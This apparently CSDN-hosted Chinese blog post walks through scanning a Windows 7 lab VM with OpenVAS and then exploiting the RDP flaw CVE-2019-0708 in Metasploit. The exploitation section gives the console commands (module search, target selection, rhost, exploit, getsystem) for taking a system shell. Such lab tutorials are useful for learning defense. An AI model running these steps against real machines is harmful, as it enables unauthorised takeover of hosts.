漏洞扫描和利用

红太狼 2022-12-08 14:20 296阅读 0赞

声明：禁止用作非法目的，谢绝一切形式的转载。

在[这里][Link 1]对OpenVas进行了简单的介绍。这篇文章着重介绍通过OpenVas扫描出来漏洞之后，如何利用这些漏洞达到获取被入侵机器"肉鸡"的shell(也就是控制权)。

### OpenVAS ###

#### GSM协议 ####

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlbGxvd29ybGRkbQ_size_16_color_FFFFFF_t_70_pic_center]NTP – Time synchronization  
• Connecting to 123/udp  
• Mandatory  
• Not encrypted  
• May use internal NTP server  
Feeds (see below)  
• Direct

*  Connecting to 24/tcp or 443/tcp
 *  Direct internet access required

• Via proxy

*  Connecting to internal HTTP proxy supporting CONNECT method on configurable port

• Connecting to apt.greenbone.net and feed.greenbone.net  
• Mandatory on stand-alone and master appliances  
• Used protocol is SSH  
• Encrypted and bidirectionally authenticated via SSH

*  Server: public key
 *  Client: public key

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlbGxvd29ybGRkbQ_size_16_color_FFFFFF_t_70_pic_center 1]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlbGxvd29ybGRkbQ_size_16_color_FFFFFF_t_70_pic_center 2]

#### 术语 ####

Alert: An alert is an action which can be triggered by certain events. In most cases, this means the output of a notification, e.g., an e-mail in case of new found vulnerabilities.

CVE: Common Vulnerabilities and Exposures (CVE) is a dictionary of publicly known information security vulnerabilities and exposures.

QoD: The Quality of Detection (QoD) is a value between 0 % and 100 % describing the reliability of the executed vulnerability detection or product detection.

### OpenVas扫描 ###

通过"Configuration"设置扫描目标(本文使用Vmware虚拟机 Win7 64 SP1操作系统), 通过"Scan" 设置扫描任务。扫描结果如下:  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlbGxvd29ybGRkbQ_size_16_color_FFFFFF_t_70_pic_center 3]  
查看nginx条目(Vmware虚拟机 Win7 64 SP1操作系统)报告信息：  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlbGxvd29ybGRkbQ_size_16_color_FFFFFF_t_70_pic_center 4]从扫描结果中可以看出存在CVE-2019-0708漏洞，这是一个由微软的RDP服务引起的任意代码执行漏洞，漏洞的详细信息如下。  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlbGxvd29ybGRkbQ_size_16_color_FFFFFF_t_70_pic_center 5]

### 漏洞利用 ###

1.  开启msf

msfconsole

1.  搜索模块

search cve-2019-0708

1.  选择攻击模块

use 1

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlbGxvd29ybGRkbQ_size_16_color_FFFFFF_t_70_pic_center 6]

1.  选择攻击目标

show targets

set target 2

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlbGxvd29ybGRkbQ_size_16_color_FFFFFF_t_70_pic_center 7]

1.  设置远程目标ip

set rhost 192.168.42.148

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlbGxvd29ybGRkbQ_size_16_color_FFFFFF_t_70_pic_center 8]

1.  执行

exploit

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlbGxvd29ybGRkbQ_size_16_color_FFFFFF_t_70_pic_center 9]通过getsystem提权获得最高权限system，然后就真的可以为所欲为了。

### 写在最后 ###

Win7系统的漏洞还是很多的，目前微软已经停止了对Win7系统的维护，使用Win7系统要谨慎。当然这并不能说明win10系统就安全了，漏洞也是多的可怕。

对于远程桌面，谨慎开启。3389这个端口，无论在微软的那个系统中，都是漏洞泛滥之地。

### 公众号 ###

更多内容，欢迎关注我的微信公众号:无情剑客。  
![在这里插入图片描述][20200920100159296.jpg_pic_center]

[Link 1]: https://mp.weixin.qq.com/s?__biz=MzI1NjEyMzgxMw==&mid=2247484059&idx=1&sn=1844683a2db9de463e1c839dd1f29c53&chksm=ea2a3451dd5dbd476fba5183521acc0741b1d31c5c1881ecb836ad4424fa588c8fc2e63256da&token=53035643&lang=zh_CN#rd
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlbGxvd29ybGRkbQ_size_16_color_FFFFFF_t_70_pic_center]: /images/20221123/9d50abae30e24867ae8efecd9826672a.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlbGxvd29ybGRkbQ_size_16_color_FFFFFF_t_70_pic_center 1]: /images/20221123/cd3bf398930e483792b461d85557b5d3.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlbGxvd29ybGRkbQ_size_16_color_FFFFFF_t_70_pic_center 2]: /images/20221123/5393b8b0cafc4ab58bb1621288ec9dfb.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlbGxvd29ybGRkbQ_size_16_color_FFFFFF_t_70_pic_center 3]: /images/20221123/a152838e0e594b859e38b8bc8689a7cf.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlbGxvd29ybGRkbQ_size_16_color_FFFFFF_t_70_pic_center 4]: /images/20221123/acd9e376d6a34d089f005a2060230627.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlbGxvd29ybGRkbQ_size_16_color_FFFFFF_t_70_pic_center 5]: /images/20221123/6daa24d7c627410fa40559a8ee190e9f.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlbGxvd29ybGRkbQ_size_16_color_FFFFFF_t_70_pic_center 6]: /images/20221123/20f127e520be4f3cab4a11056122d63d.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlbGxvd29ybGRkbQ_size_16_color_FFFFFF_t_70_pic_center 7]: /images/20221123/9da7665f003a4581b50a390dbd0c133c.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlbGxvd29ybGRkbQ_size_16_color_FFFFFF_t_70_pic_center 8]: /images/20221123/eb315554f7dd4653b5b168df0163b240.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlbGxvd29ybGRkbQ_size_16_color_FFFFFF_t_70_pic_center 9]: /images/20221123/88183410fd414872abf58316e9f18898.png
[20200920100159296.jpg_pic_center]: /images/20221123/05886ce3915347b7915f722ffca45eb3.png